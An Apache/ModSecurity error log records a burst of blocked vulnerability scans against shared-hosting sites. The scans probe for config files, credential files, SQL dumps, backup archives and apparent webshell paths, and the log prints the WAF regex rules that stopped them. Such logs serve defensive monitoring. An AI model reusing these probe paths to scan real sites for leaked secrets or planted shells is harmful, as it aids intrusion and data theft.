[Tue May 26 14:22:52.119586 2026] [security2:error] [pid 606909:tid 607126] [client 20.45.47.31:45230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/settings.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcYAAAANw"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.120191 2026] [security2:error] [pid 606909:tid 607106] [client 20.45.47.31:45360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/inc/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcaAAAAMg"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.120197 2026] [security2:error] [pid 606909:tid 607100] [client 20.45.47.31:45246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/config/mail.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcZQAAAMI"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.120281 2026] [security2:error] [pid 606909:tid 607082] [client 20.45.47.31:45410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/system/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcZgAAALA"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.122090 2026] [security2:error] [pid 606909:tid 607165] [client 20.45.47.31:45472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/app/config/database.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcbwAAAQM"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.122093 2026] [security2:error] [pid 606909:tid 607091] [client 20.45.47.31:45340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/inc/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcbgAAALk"]
[Tue May 26 14:22:52.122206 2026] [security2:error] [pid 606909:tid 607064] [client 20.45.47.31:45338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/includes/db.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcagAAAJ4"]
[Tue May 26 14:22:52.124668 2026] [security2:error] [pid 606909:tid 607076] [client 20.226.60.108:14406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcPAAAAKo"]
[Tue May 26 14:22:52.124929 2026] [security2:error] [pid 606909:tid 607127] [client 20.45.47.31:45116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/mail.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcUwAAAN0"], referer: https://www.google.com/
[Tue May 26 14:22:52.125104 2026] [security2:error] [pid 606909:tid 607076] [client 20.226.60.108:14406] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/config.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcPAAAAKo"]
[Tue May 26 14:22:52.134007 2026] [http2:info] [pid 610693:tid 610693] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:22:52.134964 2026] [security2:error] [pid 606909:tid 607153] [client 20.45.47.31:45888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/site.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcfAAAAPc"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.135138 2026] [security2:error] [pid 606909:tid 607090] [client 20.45.47.31:45896] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/backup.old"] [unique_id "ahVfZF0yRtX9qA7aVUVceQAAALg"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.135854 2026] [security2:error] [pid 606909:tid 607155] [client 20.45.47.31:45682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcfQAAAPk"], referer: https://www.google.com/
[Tue May 26 14:22:52.140926 2026] [security2:error] [pid 606909:tid 607143] [client 20.45.47.31:45708] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/dump.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcYgAAAO0"]
[Tue May 26 14:22:52.148432 2026] [security2:error] [pid 606909:tid 607154] [client 20.45.47.31:45692] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/db_backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcggAAAPg"]
[Tue May 26 14:22:52.181980 2026] [security2:error] [pid 606909:tid 607068] [client 20.45.47.31:45922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/mysql.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcigAAAKI"], referer: https://duckduckgo.com/
[Tue May 26 14:22:52.185231 2026] [security2:error] [pid 606909:tid 607071] [client 20.45.47.31:45782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/full_backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcjAAAAKU"]
[Tue May 26 14:22:52.185810 2026] [security2:error] [pid 606909:tid 607166] [client 20.45.47.31:45760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database_backup.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVciwAAAQQ"], referer: https://www.google.com/
[Tue May 26 14:22:52.231391 2026] [security2:error] [pid 606909:tid 607041] [client 20.45.47.31:45954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/export.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVckQAAAIc"]
[Tue May 26 14:22:52.231683 2026] [security2:error] [pid 606909:tid 607077] [client 20.45.47.31:45786] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.199.245"] [uri "/site_backup.zip"] [unique_id "ahVfZF0yRtX9qA7aVUVckgAAAKs"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.232696 2026] [security2:error] [pid 606909:tid 607148] [client 20.45.47.31:45938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/data.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVckAAAAPI"]
[Tue May 26 14:22:52.234151 2026] [security2:error] [pid 606909:tid 607067] [client 20.45.47.31:45772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/db_dump.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVclQAAAKE"]
[Tue May 26 14:22:52.234392 2026] [security2:error] [pid 606909:tid 607105] [client 20.45.47.31:45906] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/config.old"] [unique_id "ahVfZF0yRtX9qA7aVUVclgAAAMc"], referer: https://www.bing.com/search
[Tue May 26 14:22:52.238225 2026] [security2:error] [pid 606909:tid 607086] [client 20.45.47.31:45856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/backup.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcmAAAALQ"], referer: https://www.google.com/search?q=
[Tue May 26 14:22:52.241034 2026] [security2:error] [pid 606909:tid 607103] [client 20.45.47.31:45872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/config.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcnQAAAMU"], referer: https://www.google.com/
[Tue May 26 14:22:52.241292 2026] [security2:error] [pid 606909:tid 607144] [client 20.45.47.31:45900] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database.old"] [unique_id "ahVfZF0yRtX9qA7aVUVcngAAAO4"]
[Tue May 26 14:22:52.243188 2026] [security2:error] [pid 606909:tid 607145] [client 20.45.47.31:45858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/database.bak"] [unique_id "ahVfZF0yRtX9qA7aVUVcnwAAAO8"], referer: https://www.google.com/
[Tue May 26 14:22:52.275952 2026] [security2:error] [pid 606909:tid 607116] [client 20.45.47.31:45930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/mysqldump.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcoQAAANI"], referer: https://www.google.com/
[Tue May 26 14:22:52.278063 2026] [security2:error] [pid 606909:tid 607078] [client 20.45.47.31:45956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "208.91.199.245"] [uri "/db.sql"] [unique_id "ahVfZF0yRtX9qA7aVUVcogAAAKw"]
[Tue May 26 14:22:52.278579 2026] [security2:error] [pid 610693:tid 610949] [client 20.45.47.31:46028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/credentials.php"] [unique_id "ahVfZDvNO3hpmlY6M8RSyQAAAH4"], referer: https://search.yahoo.com/
[Tue May 26 14:22:52.282108 2026] [security2:error] [pid 610693:tid 610950] [client 20.45.47.31:45984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.47.45.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "208.91.199.245"] [uri "/secrets.php"] [unique_id "ahVfZDvNO3hpmlY6M8RSywAAAH8"]
[Tue May 26 14:22:52.481988 2026] [security2:error] [pid 606909:tid 607072] [client 20.226.60.108:22364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/num.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcqQAAAKY"]
[Tue May 26 14:22:52.482119 2026] [security2:error] [pid 606909:tid 607072] [client 20.226.60.108:22364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/num.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcqQAAAKY"]
[Tue May 26 14:22:52.564036 2026] [security2:error] [pid 606909:tid 607157] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfZF0yRtX9qA7aVUVciAAAAPs"]
[Tue May 26 14:22:52.709430 2026] [security2:error] [pid 606909:tid 606937] [remote 213.171.208.232:32992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVfZF0yRtX9qA7aVUVcrQAAlRs"]
[Tue May 26 14:22:52.836078 2026] [security2:error] [pid 610693:tid 610857] [client 20.226.60.108:39123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/areak1.php"] [unique_id "ahVfZDvNO3hpmlY6M8RS1AAAACI"]
[Tue May 26 14:22:52.836187 2026] [security2:error] [pid 610693:tid 610857] [client 20.226.60.108:39123] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/areak1.php"] [unique_id "ahVfZDvNO3hpmlY6M8RS1AAAACI"]
[Tue May 26 14:22:53.202231 2026] [security2:error] [pid 606909:tid 607140] [client 20.226.60.108:39113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/vc.php"] [unique_id "ahVfZV0yRtX9qA7aVUVctwAAAOo"]
[Tue May 26 14:22:53.202331 2026] [security2:error] [pid 606909:tid 607140] [client 20.226.60.108:39113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/vc.php"] [unique_id "ahVfZV0yRtX9qA7aVUVctwAAAOo"]
[Tue May 26 14:22:53.566032 2026] [security2:error] [pid 610693:tid 610875] [client 20.226.60.108:42357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS2wAAADQ"]
[Tue May 26 14:22:53.566152 2026] [security2:error] [pid 610693:tid 610875] [client 20.226.60.108:42357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS2wAAADQ"]
[Tue May 26 14:22:53.920938 2026] [security2:error] [pid 610693:tid 610866] [client 20.226.60.108:39116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/core.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS5gAAACs"]
[Tue May 26 14:22:53.921070 2026] [security2:error] [pid 610693:tid 610866] [client 20.226.60.108:39116] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/core.php"] [unique_id "ahVfZTvNO3hpmlY6M8RS5gAAACs"]
[Tue May 26 14:22:54.355004 2026] [autoindex:error] [pid 606909:tid 607044] [client 20.226.60.108:49171] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:22:54.356064 2026] [security2:error] [pid 606909:tid 607044] [client 20.226.60.108:49171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfZl0yRtX9qA7aVUVcxQAAAIo"]
[Tue May 26 14:22:54.603873 2026] [autoindex:error] [pid 606909:tid 607089] [client 20.226.60.108:49171] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:22:54.604586 2026] [security2:error] [pid 606909:tid 607089] [client 20.226.60.108:49171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfZl0yRtX9qA7aVUVcxwAAALc"]
[Tue May 26 14:22:54.786457 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:49171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/min.php"] [unique_id "ahVfZl0yRtX9qA7aVUVczAAAAIg"]
[Tue May 26 14:22:54.786589 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:49171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/min.php"] [unique_id "ahVfZl0yRtX9qA7aVUVczAAAAIg"]
[Tue May 26 14:22:54.937275 2026] [security2:error] [pid 610693:tid 610919] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfZjvNO3hpmlY6M8RS6wAAAGA"]
[Tue May 26 14:22:55.155526 2026] [security2:error] [pid 606909:tid 607097] [client 20.226.60.108:14487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVfZ10yRtX9qA7aVUVc0QAAAL8"]
[Tue May 26 14:22:55.155658 2026] [security2:error] [pid 606909:tid 607097] [client 20.226.60.108:14487] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVfZ10yRtX9qA7aVUVc0QAAAL8"]
[Tue May 26 14:22:55.520029 2026] [security2:error] [pid 610693:tid 610895] [client 20.226.60.108:39854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ws37.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS9AAAAEg"]
[Tue May 26 14:22:55.520183 2026] [security2:error] [pid 610693:tid 610895] [client 20.226.60.108:39854] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ws37.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS9AAAAEg"]
[Tue May 26 14:22:55.893940 2026] [security2:error] [pid 610693:tid 610945] [client 20.226.60.108:14513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/new.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS-QAAAHo"]
[Tue May 26 14:22:55.894055 2026] [security2:error] [pid 610693:tid 610945] [client 20.226.60.108:14513] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/new.php"] [unique_id "ahVfZzvNO3hpmlY6M8RS-QAAAHo"]
